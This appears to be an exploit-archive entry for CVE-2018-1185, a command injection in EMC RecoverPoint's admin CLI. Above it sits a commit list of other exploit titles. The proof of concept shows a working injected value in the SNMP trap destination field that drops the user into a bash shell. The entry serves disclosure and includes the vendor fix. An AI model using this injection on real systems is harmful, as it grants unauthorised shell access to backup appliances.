7788a305c5
6 changes to exploits/shellcodes 2345 Security Guard 3.7 - Denial of Service 2345 Security Guard 3.7 - '2345NetFirewall.sys' Denial of Service 2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service Reaper 5.78 - Local Buffer Overflow EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit) Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit) Open-AudIT Professional - 2.1.1 - Cross-Site Scripting Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC Ncomputing vSpace Pro 10/11 - Directory Traversal Fastweb FASTGate 0.00.47 - Cross-site Request Forgery Fastweb FASTGate 0.00.47 - Cross-Site Request Forgery Open-AudIT Community - 2.2.0 – Cross-Site Scripting
27 lines
No EOL
987 B
Text
27 lines
No EOL
987 B
Text
# Exploit Title: EMC RecoverPoint 4.3 - Admin CLI Command Injection
|
|
# Version: RecoverPoint prior to 5.1.1 RecoverPoint for VMs prior to 5.0.1.3
|
|
# Date: 2018-05-11
|
|
# Exploit Author: Paul Taylor
|
|
# Github: https://github.com/bao7uo
|
|
# Tested on: RecoverPoint for VMs 4.3, RecoverPoint 4.4.SP1.P1
|
|
# CVE: CVE-2018-1185
|
|
|
|
1. Description
|
|
|
|
An OS command injection vulnerability resulting in code execution as the built-in admin user.
|
|
|
|
A crafted entry can result in the ability to escape from the restricted admin user's menu driven CLI to a full Linux operating system shell in the context of the admin user. The attack vector is the trap destination (hostname/IP) parameter of the test_snmp function.
|
|
|
|
2. Proof of Concept
|
|
|
|
RecoverPoint> test_snmp
|
|
Enter the trap destination (host name or IP)
|
|
> /dev/null 2>&1 ; bash #
|
|
admin@RecoverPoint:/home/kos/cli$ exit
|
|
exit
|
|
Test completed successfully.
|
|
RecoverPoint>
|
|
|
|
3. Solution:
|
|
|
|
Update to latest version of RecoverPoint |